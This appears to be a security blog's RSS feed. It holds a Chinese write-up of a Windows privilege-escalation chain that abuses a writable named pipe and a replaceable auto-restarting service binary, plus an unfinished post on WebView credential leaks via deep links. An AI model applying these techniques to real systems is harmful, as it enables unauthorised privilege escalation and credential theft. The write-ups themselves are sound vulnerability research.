{"@attributes":{"version":"2.0"},"channel":{"title":"Chen's Blog","description":"Chen's Blog\uff0c\u5206\u4eab\u5b89\u5168\u9886\u57df\u7684\u6240\u601d\u3001\u6240\u60f3\u3001\u6240\u5b66\u3002","link":"https:\/\/gh0st.cn","item":[{"title":"\u63d0\u6743\u5b9e\u5f55\uff1a\u901a\u8fc7\u547d\u540d\u7ba1\u9053\u52ab\u6301\u53ef\u5199\u670d\u52a1","description":"

\u63d0\u6743\u5b9e\u5f55\uff1a\u901a\u8fc7\u547d\u540d\u7ba1\u9053\u52ab\u6301\u53ef\u5199\u670d\u52a1<\/h1>\n\n

\u524d\u8a00<\/h2>\n\n

\u5728\u5206\u6790\u67d0 Windows \u5e94\u7528\u7684\u670d\u52a1\u7ec4\u4ef6\u65f6\uff0c\u53d1\u73b0\u5176\u521b\u5efa\u7684\u547d\u540d\u7ba1\u9053\u8bbf\u95ee\u63a7\u5236\u914d\u7f6e\u5bbd\u677e\uff0c\u5141\u8bb8\u4f4e\u6743\u9650\u7528\u6237\u8fde\u63a5\u5e76\u53d1\u9001\u6307\u4ee4\uff0c\u4ece\u800c\u89e6\u53d1\u9ad8\u6743\u9650\u7684\u7ec8\u6b62\u4efb\u610f\u8fdb\u7a0b\u64cd\u4f5c\uff08taskkill<\/code>\uff09\u3002\u8fdb\u4e00\u6b65\u5206\u6790\u53d1\u73b0\uff0c\u88ab\u7ec8\u6b62\u7684\u670d\u52a1\u4f1a\u81ea\u52a8\u91cd\u542f\uff0c\u800c\u5176\u53ef\u6267\u884c\u6587\u4ef6\u7684\u6743\u9650\u914d\u7f6e\u9519\u8bef\uff0c\u5141\u8bb8 Everyone \u7ec4\u8bfb\u5199\u3002\u7ed3\u5408\u8fd9\u4e24\u4e2a\u7f3a\u9677\uff0c\u53ef\u6784\u9020\u4e00\u6761\u5b8c\u6574\u7684\u672c\u5730\u63d0\u6743\u5229\u7528\u94fe\u3002<\/p>\n\n

\u6f0f\u6d1e\u6316\u6398\u8fc7\u7a0b<\/h2>\n\n

\u547d\u540d\u7ba1\u9053<\/h3>\n\n

\u5173\u4e8e\u547d\u540d\u7ba1\u9053<\/h4>\n\n

\u547d\u540d\u7ba1\u9053\uff08Named Pipe\uff09\u662f Windows \u64cd\u4f5c\u7cfb\u7edf\u63d0\u4f9b\u7684\u4e00\u79cd\u8fdb\u7a0b\u95f4\u901a\u4fe1\uff08IPC\uff09\u673a\u5236\uff0c\u5141\u8bb8\u4e0d\u540c\u8fdb\u7a0b\uff08\u5305\u62ec\u8de8\u4f1a\u8bdd\u3001\u8de8\u6743\u9650\u7ea7\u522b\uff09\u901a\u8fc7\u4e00\u4e2a\u5e26\u540d\u79f0\u7684\u7ba1\u9053\u8fdb\u884c\u53cc\u5411\u6216\u5355\u5411\u6570\u636e\u4ea4\u6362\u3002\u547d\u540d\u7ba1\u9053\u5177\u6709\u5168\u5c40\u53ef\u89c1\u7684\u540d\u79f0\uff08\u901a\u5e38\u4f4d\u4e8e \\pipe\\<\/code> \u547d\u540d\u7a7a\u95f4\u4e0b\uff0c\u5982 \\\\.\\pipe\\KeyServicePipe<\/code>\uff09\uff0c\u652f\u6301\u591a\u5ba2\u6237\u7aef\u8fde\u63a5\uff0c\u5e76\u53ef\u901a\u8fc7\u5b89\u5168\u63cf\u8ff0\u7b26\uff08Security Descriptor\uff09 \u8bbe\u7f6e\u8bbf\u95ee\u63a7\u5236\u5217\u8868\uff08ACL\uff09\uff0c\u4ee5\u9650\u5236\u54ea\u4e9b\u7528\u6237\u6216\u7ec4\u53ef\u4ee5\u8bfb\u53d6\u3001\u5199\u5165\u6216\u521b\u5efa\u8fde\u63a5\u3002<\/p>\n\n

\u547d\u540d\u7ba1\u9053\u5e38\u88ab\u7528\u4f5c\u9ad8\u6743\u9650\u670d\u52a1\u4e0e\u4f4e\u6743\u9650\u5ba2\u6237\u7aef\u4e4b\u95f4\u7684\u901a\u4fe1\u901a\u9053\u3002\u7136\u800c\uff0c\u82e5\u5f00\u53d1\u8005\u672a\u6b63\u786e\u914d\u7f6e\u7ba1\u9053\u7684 ACL\uff08\u4f8b\u5982\u5141\u8bb8 Everyone \u6216 Authenticated Users \u5177\u6709\u5199\u6743\u9650\uff09\uff0c\u653b\u51fb\u8005\u5c31\u53ef\u4ee5\u4f5c\u4e3a\u5ba2\u6237\u7aef\u5411\u670d\u52a1\u7aef\u53d1\u9001\u6d88\u606f\uff0c\u4ece\u800c\u4f7f\u5f97\u670d\u52a1\u6267\u884c\u654f\u611f\u64cd\u4f5c\uff08\u5982\u542f\u52a8\/\u7ec8\u6b62\u8fdb\u7a0b\u3001\u8bfb\u53d6\u6587\u4ef6\u7b49\uff09\uff0c\u4ee5\u6b64\u6784\u6210\u6743\u9650\u63d0\u5347\u6216\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u7684\u98ce\u9669\u3002<\/p>\n\n

\u53d1\u73b0\u547d\u540d\u7ba1\u9053<\/h4>\n\n

\u53d1\u73b0\u547d\u540d\u7ba1\u9053\u53ca\u67e5\u770b\u5176\u5bf9\u5e94\u7684 ACL \u7b56\u7565\u53ef\u4ee5\u501f\u52a9 Sysinternals Suite<\/a> \u5185\u7684 pipelist<\/code> \u548c accesschk<\/code>\u3002\u8fd9\u91cc 0cat<\/a> \u5411\u6211\u63a8\u8350\u4e86\u4e00\u6b3e\u53ef\u89c6\u5316\u53cb\u597d\u7684\u5de5\u5177\uff1aPipetap<\/a>\u3002\u901a\u8fc7\u67e5\u770b Pipelist<\/code> \u53d1\u73b0\u5b58\u5728\u4e00\u4e2a ACL \u7b56\u7565\u4e3a Everyone \u53ef\u5199\u7684\u547d\u540d\u7ba1\u9053\uff1aKeyServicePipe<\/code>\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u8be5\u547d\u540d\u7ba1\u9053\u5bf9\u5e94\u7684\u8fdb\u7a0b\u4e5f\u662f\u4ee5 System<\/code> \u6743\u9650\u8fd0\u884c\u7740\uff0c\u5b8c\u5168\u7b26\u5408\u6211\u4eec\u6316\u6398\u63d0\u6743\u7684\u6761\u4ef6\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u8fdb\u7a0b\u7ec8\u6b62\u903b\u8f91<\/h4>\n\n

\u6839\u636e\u547d\u540d\u7ba1\u9053\u670d\u52a1\u8fdb\u7a0b\u5b9a\u4f4d\u5230\u5176\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u63a5\u7740\u901a\u8fc7 IDA \u8fdb\u884c\u4e00\u952e\u5bfc\u51fa\u53cd\u7f16\u8bd1\u4ee3\u7801<\/a>\u3002\u914d\u5408\u7740 AI \u8fdb\u884c\u5206\u6790\uff0c\u5f88\u5bb9\u6613\u5c31\u5b9a\u4f4d\u5230\u76f8\u5173\u4fe1\u606f\u3002<\/p>\n\n

\u9996\u5148\u662f\u5165\u53e3\u63a5\u6536\u5230\u4fe1\u606f\u5e76\u6839\u636e\u4e0d\u540c\u7684\u504f\u79fb\u91cf\u89e3\u6790\u5ba2\u6237\u7aef\u6240\u53d1\u9001\u8fc7\u6765\u7684\u6d88\u606f\uff0c\u6839\u636e\u8fd9\u4e9b\u504f\u79fb\u91cf\u5f97\u77e5\u6d88\u606f\u5305\u542b 2 \u4e2a\u90e8\u5206\uff1a\u6d88\u606f\u5934\u548c\u6d88\u606f\u4f53\uff0c\u6d88\u606f\u5934\u4e3a 12 \u4e2a\u5b57\u8282\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u5176\u6b21\u662f\u6d88\u606f\u5934\u7684\u903b\u8f91\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u89c1\u5176\u6709\u4e09\u4e2a\u90e8\u5206\uff0c\u6bcf\u4e2a\u90e8\u5206\u521a\u597d 4 \u5b57\u8282\uff08DWORD\uff09\u3002\u4e09\u4e2a\u90e8\u5206\u5206\u522b\u4e3a\uff1a\u4f1a\u8bdd ID\u3001\u6d88\u606f\u7c7b\u578b\u3001\u6d88\u606f\u4f53\u957f\u5ea6\u3002\u8fd9\u4e9b\u4fe1\u606f\u4e5f\u662f\u57fa\u4e8e\u540e\u7eed\u7684\u8c03\u8bd5\u8f93\u51fa\u6240\u5f97\u77e5\u3002\u8bfb\u5230\u6d88\u606f\u7c7b\u578b\u540e\uff0c\u4f1a\u5224\u65ad\u6d88\u606f\u7c7b\u578b\u7684\u8303\u56f4\u5fc5\u987b\u5728 1-37 \u4e4b\u95f4\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u6700\u540e\u5c31\u8fdb\u5165\u6d88\u606f\u5206\u53d1\uff0c\u6839\u636e\u4e0d\u540c\u7684\u6d88\u606f\u7c7b\u578b\u8fdb\u884c\u5206\u53d1\u3002\u4e0d\u540c\u7684\u6d88\u606f\u7c7b\u578b\u5bf9\u5e94\u4e0d\u540c\u7684\u5904\u7406\u903b\u8f91\uff0c\u5728\u8fd9\u91cc\u5b9e\u9645\u4e0a\u8e29\u4e86\u4e2a\u5751\uff0c\u6b63\u5e38\u8ddf\u8fdb\u5411\u4e0b\u7684\u903b\u8f91 Map \u5bfb\u627e\uff0c\u800c\u5b9e\u9645\u4e0a\u5728\u670d\u52a1\u521b\u5efa\u7684\u6784\u9020\u51fd\u6570\u5185\u5c31\u5df2\u7ecf\u5b9a\u4e49\u597d\u4e86\uff1asub_424FF0(v5, \u6d88\u606f\u7c7b\u578b, \u6d88\u606f\u5904\u7406\u51fd\u6570)<\/code>\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u5173\u952e\u95ee\u9898\u903b\u8f91\u5c31\u662f\u5176\u4f5c\u4e3a\u547d\u540d\u7ba1\u9053\u670d\u52a1\u7aef\u6709\u4e00\u4e2a\u6d88\u606f\u63a5\u6536\u5206\u53d1\u673a\u5236\uff0c\u6839\u636e\u6d88\u606f\u7c7b\u578b\u6765\u8fdb\u884c\u6d88\u606f\u7684\u5206\u53d1\u3002\u5982\u56fe\u6240\u793a\uff0c\u5f53\u6d88\u606f\u7c7b\u578b\u4e3a 24<\/code> \u65f6\u5219\u8fdb\u5165\u6d88\u606f\u8fdb\u5165 sub_4216B0<\/code> \u51fd\u6570\u5904\u7406\u3002<\/p>\n\n

\u5728 sub_4216B0<\/code> \u51fd\u6570\u5185\u672c\u8d28\u4e0a\u5c31\u662f\u83b7\u53d6\u6d88\u606f\u4f53\u8fdb\u884c\u5904\u7406\uff0c\u6700\u91cd\u8981\u7684\u5c31\u884c\u6d88\u606f\u4f53\u7684 +4<\/code> \u5b57\u8282\u504f\u79fb\u4f4d\uff0c\u5176\u4e3a PID\uff08\u8fd9\u91cc\u505a\u4e86\u5f3a\u8f6c\u6362\uff0c\u56e0\u6b64\u65e0\u6cd5\u8fdb\u884c\u547d\u4ee4\u6ce8\u5165\uff09\u3002PID \u9996\u5148\u7528\u4e8e TASKLIST<\/code> \u547d\u4ee4\u8fdb\u884c\u547d\u4ee4\u67e5\u627e\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u53ea\u6709\u5f53\u6307\u5b9a\u7684 PID \u8fdb\u7a0b\u5b58\u5728\u65f6\u624d\u4f1a\u63a5\u7740\u5411\u4e0b\u8d70\uff0c\u8d70\u5230 TASKKILL<\/code> \u547d\u4ee4\uff0c\u6839\u636e PID \u5f3a\u5236\u5173\u95ed\u8fdb\u7a0b\u3002\u81f3\u6b64\uff0c\u6211\u4eec\u5c31\u53d1\u73b0\u4e86\u4e00\u6761\u4f4e\u6743\u9650\u8fdb\u7a0b\u901a\u8fc7\u547d\u540d\u7ba1\u9053\u4ee5 System<\/code> \u6743\u9650\u8fdb\u884c TASKKILL<\/code> \u4efb\u610f\u8fdb\u7a0b\u7684\u8def\u5f84\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u7cfb\u7edf\u670d\u52a1<\/h3>\n\n

\u5173\u4e8e\u7cfb\u7edf\u670d\u52a1<\/h4>\n\n

Windows \u670d\u52a1\uff08Windows Service\uff09\u662f Windows \u64cd\u4f5c\u7cfb\u7edf\u4e2d\u4e00\u79cd\u5728\u540e\u53f0\u6301\u7eed\u8fd0\u884c\u7684\u7a0b\u5e8f\uff0c\u65e0\u9700\u7528\u6237\u4ea4\u4e92\u5373\u53ef\u6267\u884c\u7279\u5b9a\u4efb\u52a1\u3002\u5982\u679c\u670d\u52a1\u5728\u914d\u7f6e\u65f6\u6ca1\u6709\u505a\u597d\u6743\u9650\u7684 ACL \u914d\u7f6e\u5219\u4f1a\u5bfc\u81f4\u4e09\u7c7b\u98ce\u9669\uff1a\u53ef\u4fee\u6539\u670d\u52a1\u4e8c\u8fdb\u5236\u6587\u4ef6\u3001\u53ef\u4fee\u6539\u670d\u52a1\u6ce8\u518c\u8868\u9879\u3001\u53ef\u4fee\u6539\u670d\u52a1\u672c\u8eab\uff0c\u6613\u88ab\u653b\u51fb\u8005\u5229\u7528\u5b9e\u73b0\u672c\u5730\u6743\u9650\u63d0\u5347\u6216\u6076\u610f\u7be1\u6539\u670d\u52a1\u914d\u7f6e\u4e0e\u8fd0\u884c\u903b\u8f91\u3002<\/p>\n\n

\u53ef\u4fee\u6539\u670d\u52a1\u4e8c\u8fdb\u5236\u6587\u4ef6<\/h4>\n\n

\u8fd9\u91cc\u76f4\u63a5\u501f\u52a9 SharpUp<\/a> \u6765\u8fdb\u884c\u4e00\u952e\u5206\u6790\uff1aSharpUp.exe check ModifiableServiceBinaries<\/code>\u3002\u53d1\u73b0\u6709\u5f88\u591a\u670d\u52a1\u7684\u53ef\u6267\u884c\u6587\u4ef6\u662f\u53ef\u4ee5\u4fee\u6539\u7684\uff0c\u4f46\u662f\u8981\u914d\u5408\u653b\u51fb\u94fe\u8def\uff0c\u5c31\u9700\u8981\u6ee1\u8db3\u88ab TASKKILL<\/code> \u5f3a\u5236\u7ec8\u6b62\u8fdb\u7a0b\u540e\uff0c\u8fd8\u4f1a\u81ea\u52a8\u91cd\u542f\u7684\u3002\u8fd9\u91cc\u6d4b\u8bd5\u51fa\u6765\u53d1\u73b0 KeyAgent<\/code> \u670d\u52a1\u6ee1\u8db3\u8fd9\u4e00\u903b\u8f91\u3002<\/p>\n\n

\"CleanShot<\/p>\n\n

\u5229\u7528\u94fe\u6784\u5efa<\/h2>\n\n

\u5229\u7528\u94fe\u6784\u5efa\u6bd4\u8f83\u7b80\u5355\uff0c\u5148\u542f\u52a8\u72ec\u7acb\u7684\u7ebf\u7a0b\u4e0d\u65ad\u7684\u5faa\u73af\u5c1d\u8bd5\u5c06\u6076\u610f\u6587\u4ef6 EvilAgent.exe<\/code> \u66ff\u6362\u76ee\u6807\u670d\u52a1\u7684\u5408\u6cd5\u53ef\u6267\u884c\u6587\u4ef6 KeyAgent.exe<\/code>\uff0c\u540c\u65f6\u4f5c\u4e3a\u5ba2\u6237\u7aef\u8fde\u63a5\u547d\u540d\u7ba1\u9053 \\\\.\\pipe\\KeyServicePipe<\/code> \u5e76\u53d1\u9001\u6784\u9020\u597d\u7684 KillProcess \u6d88\u606f\u89e6\u53d1\u547d\u540d\u7ba1\u9053\u670d\u52a1\u8fdb\u7a0b\u6267\u884c TASKKILL<\/code> \u547d\u4ee4\u7ec8\u6b62 KeyAgent.exe<\/code> \u8fdb\u7a0b\uff0c\u6700\u540e\u501f\u52a9 KeyAgent.exe<\/code> \u670d\u52a1\u81ea\u52a8\u91cd\u542f\u7279\u6027\u52a0\u8f7d\u6076\u610f\u6587\u4ef6\uff0c\u5b8c\u6210\u672c\u5730\u6743\u9650\u63d0\u5347\u7684\u5229\u7528\u94fe\u6784\u5efa\u3002<\/p>\n\n

\"mermaid-diagram-2026-01-12-203558\"<\/p>\n\n

EvilAgent.exe<\/code> \u662f SystemGap<\/a> \u9879\u76ee\u91cc\u7684 SystemGapAll<\/code>\u3002\u5176\u540c\u6837\u4e5f\u501f\u52a9\u547d\u540d\u7ba1\u9053\u5b9e\u73b0\u9ad8\u4f4e\u6743\u9650\u8fdb\u7a0b\u95f4\u7684\u901a\u4fe1\uff0c\u4f4e\u6743\u9650\u5411\u9ad8\u6743\u9650\u53d1\u9001\u8981\u6267\u884c\u7684\u547d\u4ee4\uff0c\u9ad8\u6743\u9650\u6267\u884c\u5e76\u628a\u7ed3\u679c\u8fd4\u56de\u7ed9\u4f4e\u6743\u9650\u3002<\/p>\n\n

\"4cd75d3600f7dd104be96cb3fd87d56a\"<\/p>\n\n

\u603b\u7ed3<\/h2>\n\n

\u672c\u63d0\u6743\u5229\u7528\u94fe\u7684\u6210\u529f\u6784\u5efa\uff0c\u5173\u952e\u5728\u4e8e\u547d\u540d\u7ba1\u9053\u8bbf\u95ee\u63a7\u5236\u914d\u7f6e\u4e0d\u5f53\u4e0e\u670d\u52a1\u53ef\u6267\u884c\u6587\u4ef6\u6743\u9650\u914d\u7f6e\u9519\u8bef\u8fd9\u4e24\u4e2a\u7f3a\u9677\u7684\u7ec4\u5408\u5229\u7528\uff0c\u5728\u5b9e\u6218\u8fc7\u7a0b\u4e2d\u53d1\u73b0\u8fd9\u4e5f\u7c7b\u4f3c\u7684\u95ee\u9898\u4e5f\u5f88\u591a\uff0c\u662f\u4e2a\u503c\u5f97\u5173\u6ce8\u7684\u653b\u51fb\u9762\u3002\u6700\u540e\uff0c\u5728\u6b64\u7279\u522b\u611f\u8c22 @\u503e\u65cb<\/a> \u5728\u6f0f\u6d1e\u6316\u6398\u8fc7\u7a0b\u4e2d\u63d0\u4f9b\u7684\u534f\u52a9\u3002<\/p>\n","pubDate":"2026-03-16T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2026-03-16\/1","guid":"https:\/\/gh0st.cn\/archives\/2026-03-16\/1"},{"title":"\u9ed1\u76d2\u89c6\u89d2\u4e0b\u7684 WebView \u6f0f\u6d1e\u9762\u63a2\u7d22","description":"

\u9ed1\u76d2\u89c6\u89d2\u4e0b\u7684 WebView \u6f0f\u6d1e\u9762\u63a2\u7d22<\/h1>\n\n

\u524d\u8a00<\/h2>\n\n

\u672c\u6587\u4e3b\u8981\u8bb0\u5f55\u4e86\u5728\u79fb\u52a8\u7aef\u63a2\u7d22 WebView \u7ec4\u4ef6\u6f0f\u6d1e\u7684\u8fc7\u7a0b\uff0c\u91c7\u7528\u9ed1\u76d2\u89c6\u89d2\uff0c\u6452\u5f03\u590d\u6742\u7e41\u7410\u7684\u5185\u90e8\u903b\u8f91\u5206\u6790\uff0c\u4e13\u6ce8\u4e8e\u5feb\u901f\u4e14\u76f4\u63a5\u7684\u6f0f\u6d1e\u6316\u6398\u65b9\u6cd5\u3002\u7531\u4e8e\u7b14\u8005\u624d\u758f\u5b66\u6d45\uff0c\u56e0\u6b64\u672c\u6587\u96be\u514d\u4f1a\u51fa\u73b0\u4e00\u4e9b\u6587\u7b14\u4e0d\u901a\u6216\u4e13\u4e1a\u89e3\u91ca\u4e0d\u5230\u4f4d\u7684\u60c5\u51b5\uff0c\u8fd8\u671b\u591a\u5305\u6db5\u53ca\u65a7\u6b63\u3002<\/p>\n\n

WebView \u7ec4\u4ef6<\/h2>\n\n

\u4ecb\u7ecd<\/h3>\n\n

\u987e\u540d\u601d\u4e49\uff0cWebView \u7ec4\u4ef6\u662f\u7528\u4e8e\u5728\u5e94\u7528\u7a0b\u5e8f\u4e2d\u5d4c\u5165\u548c\u5c55\u793a Web \u5185\u5bb9\u7684\u7cfb\u7edf\u7ec4\u4ef6\u3002\u901a\u8fc7\u8c03\u7528 WebView\uff0c\u5f00\u53d1\u8005\u80fd\u591f\u5b9e\u73b0\u5728\u81ea\u5df1\u7684\u5e94\u7528\u4e2d\u76f4\u63a5\u6e32\u67d3\u7f51\u9875\uff0c\u8fd9\u4ece\u67d0\u79cd\u7a0b\u5ea6\u4e0a\u6781\u5927\u5730\u7b80\u5316\u4e86\u8de8\u5e73\u53f0\u5e94\u7528\u7684\u5f00\u53d1\u6d41\u7a0b\u3002\u5229\u7528 WebView\uff0c\u5f00\u53d1\u8005\u53ea\u9700\u8fdb\u884c\u5c11\u91cf\u9002\u914d\u5de5\u4f5c\uff0c\u5373\u53ef\u5c06\u73b0\u6709\u7684 Web \u5e94\u7528\u65e0\u7f1d\u79fb\u690d\u5230\u79fb\u52a8\u5e94\u7528\u73af\u5883\u4e2d\uff0c\u663e\u8457\u63d0\u5347\u4e86\u5f00\u53d1\u6548\u7387\u548c\u7075\u6d3b\u6027\u3002<\/p>\n\n

\u573a\u666f<\/h3>\n\n

WebView \u7ec4\u4ef6\u5b9e\u9645\u4e0a\u65e0\u5904\u4e0d\u5728\u3002\u4f8b\u5982\uff0c\u5728\u624b\u673a\u4e0a\u6253\u5f00\u4e00\u4e2a\u5546\u57ce APP \u65f6\uff0c\u5c55\u793a\u7684\u5546\u54c1\u4fe1\u606f\u53ef\u80fd\u672c\u8d28\u4e0a\u5c31\u662f\u901a\u8fc7 WebView \u52a0\u8f7d\u548c\u6e32\u67d3\u7684\u7f51\u9875\u3002\u5728\u8fd9\u4e9b\u5b9e\u9645\u5e94\u7528\u573a\u666f\u4e2d\uff0c\u7528\u6237\u901a\u5e38\u4e0d\u4f1a\u5bdf\u89c9\u5230 WebView \u7684\u5b58\u5728\uff0c\u5e76\u4e14\u6240\u6709\u663e\u793a\u7684\u4fe1\u606f\u53ef\u80fd\u90fd\u662f\u7531 APP \u9884\u5148\u914d\u7f6e\u597d\u7684\u3002<\/p>\n\n

\u6f0f\u6d1e\u5165\u53e3<\/h2>\n\n

\u8981\u60f3\u8ba9\u7528\u6237\u624b\u673a\u4e0a\u7684 APP \u8c03\u7528 WebView \u7ec4\u4ef6\u5bf9\u81ea\u5b9a\u4e49\u9875\u9762\u8fdb\u884c\u6e32\u67d3\uff0c\u65b9\u6cd5\u4e3b\u8981\u5206\u4e3a\u4e24\u79cd\uff1a\u7b2c\u4e00\u7c7b\u662f\u56fd\u5185\u5e38\u89c1\u7684\u4e8c\u7ef4\u7801\u626b\u7801\uff0c\u901a\u8fc7\u626b\u63cf\u4e00\u4e2a\u6307\u5411\u7f51\u9875\u94fe\u63a5\u7684\u4e8c\u7ef4\u7801\uff0c\u4ece\u800c\u76f4\u63a5\u8c03\u7528 WebView \u52a0\u8f7d\u7279\u5b9a\u7f51\u9875\uff1b\u7b2c\u4e8c\u7c7b\u662f APP \u95f4\u7684\u8df3\u8f6c\u8c03\u7528\uff0c\u5373 URL Scheme\uff08\u5728\u5b89\u5353\u4e0a\u4e5f\u79f0\u4e3a Deep Link\uff09\uff0c\u901a\u8fc7\u8fd9\u79cd\u65b9\u5f0f\u53ef\u4ee5\u4ece\u4e00\u4e2a APP \u76f4\u63a5\u8df3\u8f6c\u5230\u53e6\u4e00\u4e2a APP \u4e2d\u7684\u7279\u5b9a\u9875\u9762\uff0c\u800c\u8fd9\u4e2a\u9875\u9762\u540c\u6837\u53ef\u80fd\u662f\u901a\u8fc7 WebView \u6765\u6e32\u67d3\u7684\u3002<\/strong><\/p>\n\n

\u4e8c\u7ef4\u7801\u626b\u63cf<\/h3>\n\n

APP \u4e0a\u7684\u4e8c\u7ef4\u7801\u626b\u7801\u529f\u80fd\u901a\u5e38\u4f5c\u7528\u4e8e\u7528\u6237\u754c\u9762\u7684\u5de6\u53f3\u4e0a\u89d2\uff0c\u5982\u679c\u627e\u4e0d\u5230\u7684\u8bdd\u5219\u53ef\u4ee5\u5728 APP \u7684\u8bbe\u7f6e\u9875\u9762\u4e2d\u627e\u5230\u201c\u626b\u4e00\u626b\u201d\u3001\u201c\u626b\u7801\u201d\u7b49\u5b57\u773c\u5c31\u53ef\u4ee5\u6253\u5f00\u76f8\u5173\u529f\u80fd\u3002<\/p>\n\n

\"\"<\/p>\n\n

URL Scheme \u8df3\u8f6c<\/h3>\n\n

\u5173\u4e8e URL Scheme\uff0c\u5bf9\u4e8e\u6211\u6765\u8bf4\u5c31\u662f\u8001\u719f\u4eba\u4e86\uff0c\u5728 2018 \u5e74\u7684\u65f6\u5019\u5c31\u5728\u535a\u5ba2\u91cc\u6d45\u6d45\u7684\u5206\u4eab\u4e86\u4e00\u4e0b\uff0c\u6709\u5174\u8da3\u53ef\u4ee5\u770b\u4e0b\uff1ahttps:\/\/gh0st.cn\/archives\/2018-12-08\/1\u3002<\/p>\n\n

\u8fd9\u91cc\u7b80\u5355\u8bf4\u660e\u4e0b\uff0cURL Scheme \u5b9e\u9645\u4e0a\u662f\u5e94\u7528\u7a0b\u5e8f\u5728\u64cd\u4f5c\u7cfb\u7edf\u5c42\u9762\u6ce8\u518c\u7684\u4e00\u79cd\u81ea\u5b9a\u4e49\u534f\u8bae\u683c\u5f0f\uff0c\u5b83\u5141\u8bb8 APP \u5b9a\u4e49\u7279\u5b9a\u7684\u534f\u8bae\u540d\uff0c\u5e76\u5728 APP \u5185\u5b9a\u4e49\u8def\u7531\u548c\u63a5\u6536\u53c2\u6570\u6765\u5b8c\u6210\u67d0\u4e9b\u529f\u80fd\uff0c\u4e0e\u6211\u4eec\u6240\u7406\u89e3\u7684 HTTP \u534f\u8bae\u5f62\u5f0f\u7684 URL \u5730\u5740\u6ca1\u6709\u4ec0\u4e48\u672c\u8d28\u533a\u522b\u3002\u5f53\u5176\u4ed6\u5e94\u7528\u6216\u6d4f\u89c8\u5668\u5c1d\u8bd5\u901a\u8fc7\u8fd9\u79cd\u81ea\u5b9a\u4e49\u534f\u8bae\u53d1\u8d77\u8bf7\u6c42\u65f6\uff0c\u7cfb\u7edf\u80fd\u591f\u8bc6\u522b\u5e76\u5b9a\u4f4d\u5230\u76f8\u5e94\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c\u7136\u540e\u4f20\u9012\u6240\u8bbf\u95ee\u7684\u529f\u80fd\u8def\u7531\u548c\u53c2\u6570\u4fe1\u606f\u7ed9\u8be5\u5e94\u7528\u8fdb\u884c\u5904\u7406\u3002<\/p>\n\n

\u5728 iOS \u548c Android \u4e0a\uff0c\u5bf9\u4e8e URL Scheme \u7684\u652f\u6301\u662f\u4e0d\u4e00\u6837\u7684\uff0c\u4f8b\u5982\u5728 iOS \u4e0a\u7684 Safari \u6d4f\u89c8\u5668\u7684\u5730\u5740\u680f\u4e2d\u76f4\u63a5\u8f93\u5165 URL Scheme \u5219\u53ef\u4ee5\u5b8c\u6210\u8df3\u8f6c\u8c03\u7528\u3002\u800c Android \u9ed8\u8ba4\u6d4f\u89c8\u5668\u4e0b\uff0c\u7528\u540c\u6837\u7684\u65b9\u5f0f\u5219\u4f1a\u63d0\u793a\u627e\u4e0d\u5230\u7f51\u9875\uff0c\u56e0\u6b64\u60f3\u8981\u8c03\u7528 URL Scheme \u5c31\u9700\u8981\u501f\u52a9 JavaScript\uff08location \u8df3\u8f6c\uff09\u6216 HTML\uff08a \u6807\u7b7e href \u70b9\u51fb\u6307\u5411\uff09\u7684\u65b9\u5f0f\uff0c\u5728 iOS \u4e0a\u4e5f\u53ef\u4ee5\u7528\u8fd9\u79cd\u65b9\u5f0f\u3002<\/p>\n\n

<a href=\"xapp:\/\/page?url=https:\/\/gh0st.cn\">Click<\/a>\n<\/code><\/pre>\n\n
\"\"<\/p>\n\n
\u5b9e\u6218\u6848\u4f8b<\/h2>\n\n
\u57fa\u4e8e\u4ee5\u4e0a\u6240\u8ff0\u7684\u4e24\u79cd\u653b\u51fb\u5165\u53e3\uff0c\u6211\u53d1\u73b0\u4e86\u8bb8\u591a APP \u4e0a\u7684\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u901a\u8fc7 WebView \u7ec4\u4ef6\u76f4\u63a5\u83b7\u53d6\u7528\u6237\u51ed\u8bc1\u3002<\/p>\n\n
WebView \u8bbf\u95ee<\/h3>\n\n
\u8bbf\u95ee\u83b7\u53d6\u51ed\u8bc1\u662f WebView \u7ec4\u4ef6\u6f0f\u6d1e\u9762\u7684\u6700\u57fa\u672c\u6f0f\u6d1e\uff0c\u901a\u8fc7\u626b\u63cf\u4e8c\u7ef4\u7801\u6216 URL Scheme \u8df3\u8f6c\u8c03\u7528 WebView \u7ec4\u4ef6\u6253\u5f00\u6307\u5b9a\u7684 URL \u5730\u5740\uff0c\u63a5\u7740\u7531\u4e8e APP \u4e3a\u8bbe\u9650\u6216\u5b58\u5728\u7ed5\u8fc7\u7684\u60c5\u51b5\u4e0b\uff0cWebView \u5185\u8bbf\u95ee\u6307\u5b9a\u7684 URL \u5730\u5740\u65f6\u4f1a\u643a\u5e26\u51ed\u8bc1\u4fe1\u606f\u3002<\/p>\n\n
\u4e3a\u4ec0\u4e48 WebView \u5185\u8bbf\u95ee\u53ef\u4ee5\u643a\u5e26\u51ed\u8bc1\uff1f<\/strong> \u56e0\u4e3a\u5f53\u524d APP \u7684\u8bbe\u8ba1\u67b6\u6784\u91c7\u7528 Native UI \u4e0e WebView \u76f8\u7ed3\u5408\u7684\u65b9\u5f0f\uff0c\u4ee5\u517c\u987e\u6027\u80fd\u4f53\u9a8c\u4e0e\u4e1a\u52a1\u7075\u6d3b\u6027\uff0c\u652f\u6301\u66f4\u4e30\u5bcc\u7684\u5e94\u7528\u573a\u666f\uff0c\u56e0\u6b64\u5728 APP \u4e0a\u8fdb\u884c\u767b\u5f55\u540e\uff0cAPP \u5728 WebView \u7684\u5e94\u7528\u573a\u666f\u4e0b\u4e5f\u4f1a\u643a\u5e26\u767b\u5f55\u51ed\u8bc1\u3002<\/p>\n\n
\u4e8c\u7ef4\u7801\u626b\u63cf<\/h4>\n\n
